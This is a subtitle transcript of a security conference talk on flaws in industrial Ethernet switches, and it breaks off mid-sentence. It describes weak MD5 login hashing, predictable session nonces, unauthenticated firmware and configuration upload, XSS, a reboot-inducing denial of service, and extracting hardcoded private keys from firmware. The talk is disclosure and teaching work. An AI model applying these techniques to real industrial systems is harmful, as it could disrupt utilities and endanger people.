1
00:00:09,900 --> 00:00:20,581
Éireann: Things are blowing up, in
industrial systems, here in Germany, this
2
00:00:20,581 --> 00:00:26,080
year! I had hoped that these things
wouldn't happen. This kind of future
3
00:00:26,080 --> 00:00:34,210
wouldn't be one that we are living in. But
unfortunately it is. And I hope that we
4
00:00:34,210 --> 00:00:39,550
can make that better, partly through the
course of this talk. But more, I think, in
5
00:00:39,550 --> 00:00:45,230
the future with your help and your work.
So I'm sorry to begin this presentation
6
00:00:45,230 --> 00:00:52,489
with such a dark thought but: This year's
theme is a new dawn. And it's always
7
00:00:52,489 --> 00:00:57,360
darkest just before the dawn. So we're
going to go through some of that darkness
8
00:00:57,360 --> 00:01:03,640
in industrial systems and SCADA-systems to
get to a better place, right? Now with
9
00:01:03,640 --> 00:01:09,550
that said no hacker really gets to be
where they are without the help of other,
10
00:01:09,550 --> 00:01:14,650
right? We stand on the shoulders of giants
and part of the key is not stepping on
11
00:01:14,650 --> 00:01:20,350
their toes, on the way up. So I would like
to say thank you to a bunch of people who
12
00:01:20,350 --> 00:01:24,720
are here and also some people who aren't
here. Particularly the Oslo hackerspace
13
00:01:24,720 --> 00:01:27,970
where I hang out. And these people have
taught me a lot of things not just about
14
00:01:27,970 --> 00:01:33,560
technology but about life and on
"aprendo", which is how Goya signed some
15
00:01:33,560 --> 00:01:40,090
of his last paintings and sketches - which
basically means "I'm still learning". OK.
16
00:01:40,090 --> 00:01:46,390
So with that said I hope that you will
enjoy this talk with its darkness and its
17
00:01:46,390 --> 00:01:49,890
humor all at the same time. I used to be
in circus, as you may have guessed from
18
00:01:49,890 --> 00:01:56,200
the mustache. So I encourage you not just
to view this as a technical vulnerability
19
00:01:56,200 --> 00:02:02,180
presentation but also as kind of live
technical standup comedy. Instead of jokes
20
00:02:02,180 --> 00:02:07,450
we have vulnerabilities. And I hope that
you will enjoy them. So these
21
00:02:07,450 --> 00:02:12,700
vulnerabilities are in switches. I chose
to focus on switches and that will become
22
00:02:12,700 --> 00:02:19,489
clear throughout the presentation, why I
chose to do that for industrial systems.
23
00:02:19,489 --> 00:02:23,580
And we are looking primarily at three
different families of switches. Because I
24
00:02:23,580 --> 00:02:28,049
don't want to pick on any one vendor. In
fact, the whole idea of this talk is to
25
00:02:28,049 --> 00:02:31,790
continue giving it. I have two other
colleagues who couldn't be here with me
26
00:02:31,790 --> 00:02:35,519
today, who have some vulnerabilities in
some other switches. And they look forward
27
00:02:35,519 --> 00:02:39,549
to presenting those vulnerabilities as
part of this presentation in the future.
28
00:02:39,549 --> 00:02:43,409
So every time we give this presentation
we'd like to give some new vulnerabilities
29
00:02:43,409 --> 00:02:49,680
and show that this is systemic and endemic
risk. So the three switches we'll be
30
00:02:49,680 --> 00:02:54,239
looking at today are the Siemens Scalance-
family, the GE Multilin-family and the
31
00:02:54,239 --> 00:02:58,819
Garrettcom Magnum family. These switches
are usually not very big. They might be 8
32
00:02:58,819 --> 00:03:05,709
ports, they might be 24 ports. And they're
used in a variety of different locations.
33
00:03:05,709 --> 00:03:13,260
So this talk is for you, if you work in a
utility, if you test industrial Ethernet
34
00:03:13,260 --> 00:03:17,480
switches, if you manage industrial
Ethernet networking, if you're comfortable
35
00:03:17,480 --> 00:03:21,510
at a Linux commandline and you play with
web apps but you don't know as much about
36
00:03:21,510 --> 00:03:25,450
reverse engineering. Don't worry, I'm
exactly the same. I suck at reverse
37
00:03:25,450 --> 00:03:31,519
engineering. But I care about this stuff.
And so I'm learning. If you are a
38
00:03:31,519 --> 00:03:35,909
developer of firmware then I think this
talk is for you as well. I hope you learn
39
00:03:35,909 --> 00:03:39,709
something from it. If you like
vulnerabilities you'll enjoy this quite a
40
00:03:39,709 --> 00:03:45,129
lot. I'm going to be sharing with you a
little collection I have, you know. Some
41
00:03:45,129 --> 00:03:51,629
people collect stamps or stories or jokes.
I collect private keys. And I like to
42
00:03:51,629 --> 00:03:58,011
share them with other enthusiasts such as
yourself. If you happen to work for one of
43
00:03:58,011 --> 00:04:01,090
the switch manufacturers you know I've
spoken to before. Some of you I get on
44
00:04:01,090 --> 00:04:06,809
with very well. We speak regularly. Some
of you not yet - but I hope you'll come
45
00:04:06,809 --> 00:04:13,199
and have a chat with me later. Ok, most
SCADA or ICS presentations go a bit like
46
00:04:13,199 --> 00:04:20,640
this: Pwn PLC, the RTU, the HMI - these
are terms, you know, that all of us in
47
00:04:20,640 --> 00:04:23,830
SCADA know. Maybe most of you know them by
now, they're pretty popular. I hope you
48
00:04:23,830 --> 00:04:27,780
do. But programmable logic controller,
remote terminal unit or human machine
49
00:04:27,780 --> 00:04:32,920
interface. And the basic idea of the
presentation is if I pwn these things,
50
00:04:32,920 --> 00:04:38,090
game over. Physical damage. I win. Isn't
the world a scary place? And I encourage
51
00:04:38,090 --> 00:04:42,240
you to demand better content. I certainly
grew up with better content. I used to go
52
00:04:42,240 --> 00:04:46,229
and see the presentations and the talks of
a guy called Jason Larson. And he has a
53
00:04:46,229 --> 00:04:50,271
fantastic example of this. I want all of
you to try it, right now. Just think
54
00:04:50,271 --> 00:04:56,110
about: If you had complete control over a
paint factory. What would you do to damage
55
00:04:56,110 --> 00:04:59,470
it? No one is going to get hurt.
Everything's safe. It's a thought
56
00:04:59,470 --> 00:05:05,630
experiment, right? What would you do to
damage it? Most people can't answer this
57
00:05:05,630 --> 00:05:09,740
question. And on certain types of
processes I can't answer this question.
58
00:05:09,740 --> 00:05:12,790
But other types I've worked with before
and I can answer this question. And I
59
00:05:12,790 --> 00:05:17,530
encourage you to to ask it. But if you
like and you want to learn more go and see
60
00:05:17,530 --> 00:05:24,069
Marmusha's talk - I think it's tomorrow.
Think of my talk as a frame for her talk.
61
00:05:24,069 --> 00:05:28,111
She's going to be talking about how to
damage a chemical process. And what you
62
00:05:28,111 --> 00:05:32,090
need to do as an engineer to do that. And
the reason she's doing that is to build a
63
00:05:32,090 --> 00:05:36,290
better process in the future. You have to
break a few things to make them work a
64
00:05:36,290 --> 00:05:41,379
little bit better. Okay. So what's the
point in industrial control systems
65
00:05:41,379 --> 00:05:47,750
security? It's not credit card data. It's
not privacy. No disrespect to my privacy
66
00:05:47,750 --> 00:05:52,240
friends in the room. I have the deepest
love and respect for the work that you do.
67
00:05:52,240 --> 00:05:58,310
But confidentially ... confidentiality is
the lowest priority for us in industrial
68
00:05:58,310 --> 00:06:04,830
systems. It would go: Availability,
integrity, confidentiality. And you might
69
00:06:04,830 --> 00:06:10,970
even swap integrity and availability in
many cases. So, you have to protect the
70
00:06:10,970 --> 00:06:16,770
sensor data or the control signals.
Everything else is maybe a vulnerability
71
00:06:16,770 --> 00:06:20,210
on the path to getting this. But it's not
the most important thing that we're trying
72
00:06:20,210 --> 00:06:25,600
to protect. So that's why I'm attacking
switches. That's where the process is,
73
00:06:25,600 --> 00:06:32,639
right? Now these may not be core switches.
They're often a little bit further down in
74
00:06:32,639 --> 00:06:37,069
the chain. They're field devices, right.
So you might find them in any of these
75
00:06:37,069 --> 00:06:44,590
locations. And this last example is not
necessarily important be cause oil and gas
76
00:06:44,590 --> 00:06:49,270
is important - but it's important because
it gives you the general format of all
77
00:06:49,270 --> 00:06:53,300
industrial systems. You have sensor
network. And sensor data is traveling back
78
00:06:53,300 --> 00:06:58,610
and forth. And you have control signal
data. That's it, basically. You might have
79
00:06:58,610 --> 00:07:01,349
different control signals on different
protocols and you might have different
80
00:07:01,349 --> 00:07:05,410
sensors on different protocols, giving you
different values like pressure or heat or
81
00:07:05,410 --> 00:07:15,889
whatever. But most processes follow
basically this format. Okay. I don't do
82
00:07:15,889 --> 00:07:19,509
SCADA 101. There are other people who do
this. I'm trying to do a little bit, to
83
00:07:19,509 --> 00:07:25,759
set the reference for this talk, but
usually I avoid it. So basically there's
84
00:07:25,759 --> 00:07:30,819
not much authentication or integrity in
industrial systems protocols. There's not
85
00:07:30,819 --> 00:07:36,370
much cryptography. You would expect there
to be, maybe. I'm continually surprised
86
00:07:36,370 --> 00:07:40,319
that I don't find any. And when I do find
it, it's badly implemented and barely
87
00:07:40,319 --> 00:07:48,229
works. So once you have compromised a
switch or another part of the network you
88
00:07:48,229 --> 00:07:51,930
can perform man-in-the-middle attacks on
the process. Or you can create malicious
89
00:07:51,930 --> 00:07:56,400
firmwares on these different switches. And
that's what I'm trying to prevent. I'm
90
00:07:56,400 --> 00:08:00,029
trying to find some of the different
methods that people can use to produce
91
00:08:00,029 --> 00:08:09,800
these firmwares - and then get the vendors
to fix them, right. Okay. These are some
92
00:08:09,800 --> 00:08:14,419
of the protocols. If you are new to this
space, if you want to do some more work in
93
00:08:14,419 --> 00:08:17,550
this area, but you don't know what to work
on, take a picture of the slide or go and
94
00:08:17,550 --> 00:08:21,319
find it later. And choose one of these
protocols and go and work on it. We need
95
00:08:21,319 --> 00:08:24,250
people to go to these different
organizations. Some of them are
96
00:08:24,250 --> 00:08:27,499
proprietary, some of them are open and
complain that there is not enough
97
00:08:27,499 --> 00:08:32,250
cryptography going on in this space. And
yes you can use VPNs. But believe me, I
98
00:08:32,250 --> 00:08:43,720
often don't find them. Okay. These are the
switches, the specific versions of the
99
00:08:43,720 --> 00:08:46,600
firmware, in case you're here for
vulnerabilities instead of just me
100
00:08:46,600 --> 00:08:52,020
waffling on about the basics. If you want
to go and look these up, if you're a
101
00:08:52,020 --> 00:08:57,910
penetration tester working in this space,
you can go and find them all online. And
102
00:08:57,910 --> 00:09:02,210
you can get a feeling for the kind of
coding practices that go into these
103
00:09:02,210 --> 00:09:07,440
different devices. Now I've tried to
choose the vulnerabilities that I'm
104
00:09:07,440 --> 00:09:14,710
presenting very carefully. To take you
gently from web app vulnerabilities into a
105
00:09:14,710 --> 00:09:19,950
little bit deeper into the firmware. So
the first one we'll be looking at is
106
00:09:19,950 --> 00:09:24,710
Siemens. And again, I'm not picking on any
particular vendor. In fact I'm very proud
107
00:09:24,710 --> 00:09:30,310
of Siemens. They're probably here again.
They're here many years. And they fixed
108
00:09:30,310 --> 00:09:35,200
these vulnerabilities within three months.
And I think that was awesome - especially
109
00:09:35,200 --> 00:09:41,500
in the space that I work in. The average
patch-time in SCADA and ICS is 18 months.
110
00:09:41,500 --> 00:09:45,500
So I think Siemens deserves a round of
applause for getting these fixed.
111
00:09:45,500 --> 00:09:52,870
Applaus
So without further ado let's have some
112
00:09:52,870 --> 00:09:58,590
fun, right. So MD5, you go to the web page
for this switch. This is the management
113
00:09:58,590 --> 00:10:03,350
page of a switch, right. And you interact
with this webpage. And you have a look at
114
00:10:03,350 --> 00:10:12,580
it. And on the client side they do MD5 of
the password. Okay. That's fascinating. I
115
00:10:12,580 --> 00:10:17,290
don't think that's particularly secure.
But it's done in roughly the same format
116
00:10:17,290 --> 00:10:20,641
as that Linux command. So I use the Linux
command instead of the JavaScript just to
117
00:10:20,641 --> 00:10:26,060
make it easier for everyone. You have the
username at the beginning and the password
118
00:10:26,060 --> 00:10:30,040
is in the middle. And then you have this
nonce that's at the end, a number you use
119
00:10:30,040 --> 00:10:34,470
once, right. I was surprised to see the
nonce, and it's even called a nonce,
120
00:10:34,470 --> 00:10:37,140
right. So somebody had done a little bit
of homework on their cryptography. And
121
00:10:37,140 --> 00:10:41,150
they understood that they wanted to use,
you know, this number used once to prevent
122
00:10:41,150 --> 00:10:45,340
replay of the hash every time. Okay,
that's some pretty good work.
123
00:10:45,340 --> 00:10:49,200
Unfortunately this is MD5 and this is
protecting your electric utilities and
124
00:10:49,200 --> 00:10:56,070
your water and your sewage systems. And
you can brute force this in a few seconds,
125
00:10:56,070 --> 00:11:00,200
if the passwords are less than eight
characters. and if they're around 15 it
126
00:11:00,200 --> 00:11:04,460
might take you 20 minutes or something.
You can do this from PCAPs, from network
127
00:11:04,460 --> 00:11:08,300
traffic captures. And then you have the
cleartext password that you can use
128
00:11:08,300 --> 00:11:16,420
forever after, with that switch. So, off
to a bad start, in my opinion. So these
129
00:11:16,420 --> 00:11:22,770
are the nonces that we're looking at. I'm
glad to hear you laughing. It makes me, it
130
00:11:22,770 --> 00:11:27,421
warms the heart, right. So you can see
that they are incrementing and that they
131
00:11:27,421 --> 00:11:37,750
are hex. Yeah. What else can you say about
this? The last half is different than the
132
00:11:37,750 --> 00:11:45,870
first half. Not only is it incrementing,
it is sequential. If you pull them quickly
133
00:11:45,870 --> 00:11:53,260
enough. For those of you who also do a bit
of reverse engineering you might recognize
134
00:11:53,260 --> 00:11:58,130
the first half as well. Anybody in the
room see any patterns in the first half of
135
00:11:58,130 --> 00:12:09,950
the of the nonces? No? Hmm? Very good, IP
address. Mac address would have been a
136
00:12:09,950 --> 00:12:13,521
good guess as well. I thought it was at
first. And I got very confused when I went
137
00:12:13,521 --> 00:12:17,340
to look for the IP address. Because I went
to the switch itself. And the switches IP
138
00:12:17,340 --> 00:12:25,080
address was not this in hex. It's the
clientside address. Which I just couldn't
139
00:12:25,080 --> 00:12:29,380
believe, right? Like, it seems like it
makes a sort of sense if you're trying to
140
00:12:29,380 --> 00:12:33,580
keep session IDs in state. And it's like
oh I want a different session for every IP
141
00:12:33,580 --> 00:12:39,480
address. And then I'll just use time, I
use uptime in hex as the rest of my
142
00:12:39,480 --> 00:12:45,160
session ID, right? You know, the entire IP
space and time that can't be brute force.
143
00:12:45,160 --> 00:12:52,250
It has a kind of crazy logic to it, right.
Unfortunately it can be. And you can get
144
00:12:52,250 --> 00:12:56,730
the uptime from the device using SNMP. And
of course if you don't want to use SNMP
145
00:12:56,730 --> 00:13:04,470
you can get old-school and use the TCP-
sequence-ID numbers. So, not a lot of
146
00:13:04,470 --> 00:13:09,550
entropy there, I guess, I would say. And I
think their lawyers agreed when they put
147
00:13:09,550 --> 00:13:17,640
out the comments on this. All right. Not
only can you perform session hijacking.
148
00:13:17,640 --> 00:13:21,050
And if you are attacking switches I'd like
to point out that session hijacking is not
149
00:13:21,050 --> 00:13:25,230
necessarily a great attack in this
environment. Think about it like you would
150
00:13:25,230 --> 00:13:29,700
at home, right. How often do you log into
your router? In fact even more importantly
151
00:13:29,700 --> 00:13:33,250
how often do you upgrade the firmware on
your router? Everyone who has upgraded the
152
00:13:33,250 --> 00:13:37,940
firmware on their router ever raise your
hand. Just for an experiment. Thank
153
00:13:37,940 --> 00:13:42,140
goodness, right. But wait, keep them up
just for a minute. Everybody who's updated
154
00:13:42,140 --> 00:13:45,670
it this year, keep your hand up. Everybody
else put them down. Everybody who has
155
00:13:45,670 --> 00:13:50,420
updated in the last six months ... okay
... So that gives you a sense of how long
156
00:13:50,420 --> 00:13:55,061
these vulnerabilities can be in play on an
industrial system's environment. If you
157
00:13:55,061 --> 00:14:01,800
multiply that by about 10, right. Okay, so
you can simply upload a firmware image to
158
00:14:01,800 --> 00:14:06,140
a Siemens Scalance device with this
version number without authentication. You
159
00:14:06,140 --> 00:14:15,700
just need to know the URL. Cross-site
request forgery, right. I just say CSRF
160
00:14:15,700 --> 00:14:20,220
all the time. I don't even remember what
it stands for. So you can upload or you
161
00:14:20,220 --> 00:14:23,381
can download a logfile. Not that useful
but you get a sense of what's going on on
162
00:14:23,381 --> 00:14:27,191
the switch. You know what usernames might
be present, whatever. Incidentally all of
163
00:14:27,191 --> 00:14:32,050
these switches by default or at least this
one only have two usernames, right. So
164
00:14:32,050 --> 00:14:37,151
it's "admin" and "operator" I think on
this switch. Or maybe it's not. But
165
00:14:37,151 --> 00:14:42,830
anyway, there's two usernames "admin" and
"manager"? I know I get them mixed up now.
166
00:14:42,830 --> 00:14:47,130
But the configuration includes password
hashes. I'm actually not even entirely
167
00:14:47,130 --> 00:14:50,620
convinced they're hashes because when you
increase the length of your password it
168
00:14:50,620 --> 00:14:55,610
increases. But I'll leave that for future
researchers to examine. You can download
169
00:14:55,610 --> 00:14:59,241
the firmware image from the device, which
is nice. So you just make a request. You
170
00:14:59,241 --> 00:15:03,110
just post an HTTP-request to this device.
And it gives you the firmware that it is
171
00:15:03,110 --> 00:15:07,820
running back. That's not that big a deal,
right. Because you're just viewing data on
172
00:15:07,820 --> 00:15:14,930
the switch. But you can upload firmware
and configuration to this device. Which is
173
00:15:14,930 --> 00:15:18,540
an authentication bypass in and of itself.
But it's also interesting because I can
174
00:15:18,540 --> 00:15:22,430
take a configuration file from one of the
devices that I have at home with a known
175
00:15:22,430 --> 00:15:27,490
password. I can upload a new configuration
file with a password that I know. I can
176
00:15:27,490 --> 00:15:31,500
use the device to do whatever I want to
do. And later I can re upload the old
177
00:15:31,500 --> 00:15:35,560
configuration file that I got from the
device, so no one ever even realizes what's
178
00:15:35,560 --> 00:15:45,730
been changed, right. So. I think that's a
disappointing state of affairs. And I
179
00:15:45,730 --> 00:15:49,340
wrote a script to do this. So that you
wouldn't have to when you are doing
180
00:15:49,340 --> 00:15:53,920
penetration tests of these device. And I
gave you a little ASCII menu because
181
00:15:53,920 --> 00:15:58,410
sometimes I get bored. Cambridge is a
small town and there's not much to do in
182
00:15:58,410 --> 00:16:05,640
the evening. So feel free to go and
examine my github-repository where I put
183
00:16:05,640 --> 00:16:11,910
up some of this stuff. I'm Blackswanburst
on Github, and on Twitter. So like I say,
184
00:16:11,910 --> 00:16:15,360
Siemens are some of my favorite people. So
I'm going to finish up with them. This is
185
00:16:15,360 --> 00:16:19,980
old day, if you like all that you have
just seen. But I want you to keep in mind
186
00:16:19,980 --> 00:16:24,230
that these vulnerabilities will still be
present in the wild for another two or
187
00:16:24,230 --> 00:16:28,980
three years. And I encourage you to go and
have a look at your systems, if you have
188
00:16:28,980 --> 00:16:34,170
any of these devices. And check them out.
And upgrade the firmware. I also hope this
189
00:16:34,170 --> 00:16:38,540
encourages you that if you haven't done
much in industrial systems and SCADA you
190
00:16:38,540 --> 00:16:42,270
don't have to be intimidated by all of the
engineering and the terminology, and the
191
00:16:42,270 --> 00:16:47,001
verb beotch(?).. There is plenty for any
of you in this room to do in the
192
00:16:47,001 --> 00:16:51,700
industrial systems space. You need to
spend a little time speaking to engineers
193
00:16:51,700 --> 00:16:56,900
and translating your vulnerabilities into
something meaningful for them. But that's
194
00:16:56,900 --> 00:17:00,250
just a matter of spending more time with
them and getting to know them. And I think
195
00:17:00,250 --> 00:17:03,740
that's valuable too because they have a
lot of experience. They care very deeply
196
00:17:03,740 --> 00:17:08,309
about safety. And I've learned quite a lot
of things from engineers. My general point
197
00:17:08,309 --> 00:17:13,601
here is I'd like you to stop defending
banks and websites and other stuff. We
198
00:17:13,601 --> 00:17:18,099
need your help in industrial systems, in
the utilities. We could really do with
199
00:17:18,099 --> 00:17:22,180
living in a safer world rather than one
where you're just protecting other
200
00:17:22,180 --> 00:17:32,480
people's money. So we're gonna move on to
the GE Multilin line. I worked on a GE
201
00:17:32,480 --> 00:17:38,830
ML800 but these vulnerabilities affect
seven of the nine switches in this family.
202
00:17:38,830 --> 00:17:43,410
Seven because one of the other switches is
an unmanaged switch. If you're a hardware
203
00:17:43,410 --> 00:17:47,880
person maybe you want to go and play
around with those but not so much my thing
204
00:17:47,880 --> 00:17:51,130
and the other one uses a different
firmware image but seven of the nine
205
00:17:51,130 --> 00:17:58,020
switches use a similar firmware image GE
offers a worldwide 10 year warranty. So
206
00:17:58,020 --> 00:18:01,950
let's see if that includes fixing
vulnerabilities. I think it should. What
207
00:18:01,950 --> 00:18:10,650
do you think. No? Couple noes couple of
yeses, undecided. All right. CCC is
208
00:18:10,650 --> 00:18:17,851
undecided on something that's novel. Let's
start with some new vulnerabilities. Cross
209
00:18:17,851 --> 00:18:22,750
site scripting. Reflected, I grant you but
still cross site scripting and I want you
210
00:18:22,750 --> 00:18:25,530
to pay attention to the details. I'm not
going to go slow for you and ask you to
211
00:18:25,530 --> 00:18:29,160
think . I know it's morning, I know it's
tough but I am going to ask you to think.
212
00:18:29,160 --> 00:18:36,970
See flash up there flash.php and the third
one. Yes, it runs flash in your browser.
213
00:18:36,970 --> 00:18:42,470
So if you know something about Flash come
and have a look at the switch some time. I
214
00:18:42,470 --> 00:18:47,751
didn't go for active script attacks. There are
so many attacks surface on this device. I
215
00:18:47,751 --> 00:18:52,460
just I sometimes don't even know how I'm
going to finish looking at all of them. So
216
00:18:52,460 --> 00:18:55,780
I just work with the web interface to
begin with. So you have this cross site
217
00:18:55,780 --> 00:19:00,680
scripting times eight and I want you to
notice in the last section there
218
00:19:00,680 --> 00:19:05,970
arbitrarily supplied URL parameters. I
don't know about you but I think that's
219
00:19:05,970 --> 00:19:10,180
funny right. You can just make up
parameters to stick your cross site
220
00:19:10,180 --> 00:19:20,480
scripting in. laughs It's unbelievable
right. Yeah. Anyways what does that look
221
00:19:20,480 --> 00:19:28,340
like. It looks like that, they have an
error data page. OK maybe I'm using a
222
00:19:28,340 --> 00:19:33,370
browser that they don't approve or
something but it deserves looking at. And
223
00:19:33,370 --> 00:19:39,470
you can do quite a lot of things with
javascript on the client side these days.
224
00:19:39,470 --> 00:19:44,480
Disturbing. Anyways I'm not a big fan of
XSS so I'm going to move on to things that
225
00:19:44,480 --> 00:19:52,690
I think are worth my time. So if you fetch
the initial web page of this switch before
226
00:19:52,690 --> 00:20:01,380
you've even logged in you get this config.
So this is pretty authentication. No
227
00:20:01,380 --> 00:20:06,850
authentication, right. Now keep in mind that
these switches are designed for process
228
00:20:06,850 --> 00:20:14,610
data, right. It's not carrying traffic to
images of cats. It's supposed to be for
229
00:20:14,610 --> 00:20:22,630
engineering. So what happens if I add a
nocache parameter and I make it say 500000
230
00:20:22,630 --> 00:20:30,030
digits long. I should just be able to
crash the web server. Right. Maybe maybe.
231
00:20:30,030 --> 00:20:41,270
But you would not expect it to reboot the
switch. And it takes a minute or so for
232
00:20:41,270 --> 00:20:44,800
the switch to reboot which is actually
really impressive comes up pretty quickly.
233
00:20:44,800 --> 00:20:50,950
But you know obviously you can repeat
this. So I wanted to examine that a lot
234
00:20:50,950 --> 00:20:56,390
further. I wanted to know more about that
that crash what was rebooting the switch.
235
00:20:56,390 --> 00:20:59,290
But like I say I'm not a very good reverse
engineer. So you're going to go on a
236
00:20:59,290 --> 00:21:02,590
little journey with me where I learned a
couple of things about reverse engineering
237
00:21:02,590 --> 00:21:06,160
and I had to change my approach from
looking at the webapp style loans to
238
00:21:06,160 --> 00:21:12,470
moving into this other stuff. So why is
why is it DoS even interesting. You'll
239
00:21:12,470 --> 00:21:18,320
remember that I mentioned Misha's talk. So
the reason I mention her talk, this is it
240
00:21:18,320 --> 00:21:23,690
right. Denial of Service on a Website. Who
cares it's tearing posters down as xkcd
241
00:21:23,690 --> 00:21:28,950
once famously explained to us but in the
industrial system's environment it's very
242
00:21:28,950 --> 00:21:33,980
different. It can be very serious right. A
simplistic example is you have an
243
00:21:33,980 --> 00:21:38,750
application that has a heartbeat and if
you stop that heartbeat it might go into
244
00:21:38,750 --> 00:21:44,060
some sort of safety state it might for
example scram a reactor. There is a famous
245
00:21:44,060 --> 00:21:50,851
denial of service on PLCs that did scram a
reactor in real life. Does anybody know
246
00:21:50,851 --> 00:21:58,650
what H2S is? Any oil and gas engineers in
the room? Okay so H2S alerts not reaching
247
00:21:58,650 --> 00:22:02,861
their destinations is pretty serious
business right. For those of you who are
248
00:22:02,861 --> 00:22:07,850
not aware of H2S it's a byproduct of
producing oil and gas and inhaled in very
249
00:22:07,850 --> 00:22:12,850
very small amounts you can go unconscious
and in sort of larger amounts. Respiratory
250
00:22:12,850 --> 00:22:18,480
failure. So if you take CA safety
seriously if you ever work on these rigs
251
00:22:18,480 --> 00:22:23,140
in these environments you learn to care
about the wind sock. Right one of these
252
00:22:23,140 --> 00:22:26,620
alerts goes out. An alarm goes off. There
are many different alarms you have to
253
00:22:26,620 --> 00:22:31,200
memorize how they all sound on a rig and
then react to them and when you hear the
254
00:22:31,200 --> 00:22:35,330
H2S alert you look up at the wind sock to
keep an eye on where the wind is and
255
00:22:35,330 --> 00:22:40,420
trying to avoid being downwind of wherever
the leak is. So a simple denial of service
256
00:22:40,420 --> 00:22:43,510
that we would not care about in a web
application environment in this
257
00:22:43,510 --> 00:22:47,940
environment can be very serious. I'm not
saying it always is. It just can be
258
00:22:47,940 --> 00:22:53,350
right. So denial of service goes up in our
list of problems especially when we're
259
00:22:53,350 --> 00:22:58,270
looking at networking devices. Okay so
that's that's it for the denial of
260
00:22:58,270 --> 00:23:01,550
service. But like I say we're going to
look at some other stuff. In fact the
261
00:23:01,550 --> 00:23:07,320
story with the switch began with a
concerned citizen about three or four
262
00:23:07,320 --> 00:23:12,280
years ago I found 10000 industrial systems
on the Internet as part of my master's
263
00:23:12,280 --> 00:23:17,990
thesis and I was pretty uncomfortable with
that. So I sent that data to various
264
00:23:17,990 --> 00:23:23,889
computer emergency response teams around
the world. I believe it was 52 of them
265
00:23:23,889 --> 00:23:26,860
right. Not all of them were critical
infrastructure. A lot of them were small
266
00:23:26,860 --> 00:23:31,370
stuff but maybe 1 in 100. I was told or in
one particular country when they got back
267
00:23:31,370 --> 00:23:38,400
to me one in 20 were considered critical
infrastructure. And after that you have a
268
00:23:38,400 --> 00:23:42,540
sort of reputation among the computer
emergency response teams of the world. So
269
00:23:42,540 --> 00:23:47,580
people send you stuff you get anonymous
e-mails from someone called Concerned
270
00:23:47,580 --> 00:23:53,330
Citizen. Thank you very much. They sent me
a firmware upgrade pcap of this particular
271
00:23:53,330 --> 00:23:57,350
device. I suspect that they worked at one
of the utilities and they wanted me to see
272
00:23:57,350 --> 00:24:05,559
how upgrading the firmware of this GE switch
was performed. So it all began with a pcap.
273
00:24:05,559 --> 00:24:11,290
So I ran TCP trace to carve out all the
files and see what was going on and you
274
00:24:11,290 --> 00:24:16,590
could see instantly that there was an FTP
session later looking at the switch I see
275
00:24:16,590 --> 00:24:21,120
that you can also upgrade them over TFTP
so the management of the switch happens in
276
00:24:21,120 --> 00:24:26,841
HTTPs and is encrypted but the firmware
upload goes across FTP right so you can
277
00:24:26,841 --> 00:24:33,700
just carve the file out a little bit of
network forensics I guess. So instantly I
278
00:24:33,700 --> 00:24:36,950
could see that this one is complete and
the ports on the end of the numbers give
279
00:24:36,950 --> 00:24:40,660
me a clue of what's going on in the larger
stream. This one seems interesting. Let's
280
00:24:40,660 --> 00:24:48,240
have a look at it. So. I tried running
file and binwalk I don't know about you
281
00:24:48,240 --> 00:24:52,860
but I believe that hacking is a journey of
understanding and facts hacking is
282
00:24:52,860 --> 00:24:57,740
understanding a system better than it
understands itself and nudging it to do
283
00:24:57,740 --> 00:25:03,950
what you want right. And I also feel that
I should understand my tools. I don't
284
00:25:03,950 --> 00:25:07,420
really understand my tools until I know
where they're going to fail me or they
285
00:25:07,420 --> 00:25:11,040
have failed me in the past and in this
particular case I think binwalk is a
286
00:25:11,040 --> 00:25:15,150
fantastic tool and file is a fantastic
tool. But they didn't tell me anything and
287
00:25:15,150 --> 00:25:18,750
that was that was a journey of discovery
for me. So that was nice. It was like OK
288
00:25:18,750 --> 00:25:21,700
binwalk doesn't always give me everything.
I think I was running an older version and
289
00:25:21,700 --> 00:25:25,179
I think it would handle it now. But the
point is after been walked didn't give me
290
00:25:25,179 --> 00:25:29,950
anything just resort to the old school
stuff right. Go strings and I found these
291
00:25:29,950 --> 00:25:34,050
deflate and inflate copywrite strings and
I could tell that a certain portion of the
292
00:25:34,050 --> 00:25:43,670
file was compressed. This is just from the
pcap. Remember this whole story. So I
293
00:25:43,670 --> 00:25:49,040
tried to deflate the whole thing. That
didn't work again. I just did something
294
00:25:49,040 --> 00:25:54,561
simple get a python script that checks
every byte to see which parts of the file
295
00:25:54,561 --> 00:26:00,831
don't produce ZLIB errors when you try and
decompress them and you figure out what
296
00:26:00,831 --> 00:26:09,170
sectors of this file are compressed. So
you go to your friend dd and you carve out
297
00:26:09,170 --> 00:26:15,760
this section of the file right. So we have
this larger firmware image with this
298
00:26:15,760 --> 00:26:21,310
little compressed section and we have now
cut this little compressed section out. I
299
00:26:21,310 --> 00:26:24,430
suppose I could have loaded this up into
python and use ZLIB to decompress it. But
300
00:26:24,430 --> 00:26:27,559
at the time I was still trying to use
command line tools and someone said I'll
301
00:26:27,559 --> 00:26:35,350
just concatenate the gzip bytes on it.
Gzip inherits from inflate and deflate. So
302
00:26:35,350 --> 00:26:39,100
if you just concatenate the bytes it
should still handle it. So I did that and
303
00:26:39,100 --> 00:26:43,920
I got a decompressed binary. When you ran
strings on that it started to make a lot
304
00:26:43,920 --> 00:26:48,750
more sense and you could find the opcodes
in it where previously it didn't make any
305
00:26:48,750 --> 00:26:53,910
sense at all. So once you've got an image
like that what do you do. Well if you're
306
00:26:53,910 --> 00:26:58,250
me you just grep for bugs. I think I
learned that from Ilija. If he's here in
307
00:26:58,250 --> 00:27:05,590
the room thank you. Thank you very much. I
asked him like a year or two ago. How do
308
00:27:05,590 --> 00:27:10,761
you how do you find so many bugs. And he
said: "Oh, I just, you know, I grep for
309
00:27:10,761 --> 00:27:16,510
them, I use find." laughs And so I
started thinking about firmware images.
310
00:27:16,510 --> 00:27:19,640
Like if I was going to grep for a bug in a
firmware image what would it be. And my
311
00:27:19,640 --> 00:27:23,840
answer is hardcoded credentials and
default keys because you find them every
312
00:27:23,840 --> 00:27:29,309
single time so I have this command aliased
on my machine and I just grep for it and I
313
00:27:29,309 --> 00:27:35,270
find private keys and this is how you too
can end up with a private key collection.
314
00:27:35,270 --> 00:27:40,465
So, there you go.
315
00:27:40,465 --> 00:27:50,240
Applause
316
00:27:50,240 --> 00:27:53,770
Yeah they're hardcoded keys,
but what are they for. It doesn't
317
00:27:53,770 --> 00:27:57,820
stop there. You know you've got the keys,
but what do they do, right? That was the
318
00:27:57,820 --> 00:28:02,500
next step of the journey for me. Two of
them you can see one sencrypted with a
319
00:28:02,500 --> 00:28:05,740
password; we'll come back to that one
later. Let's start with the one on the
320
00:28:05,740 --> 00:28:15,860
left. If you load this key up into
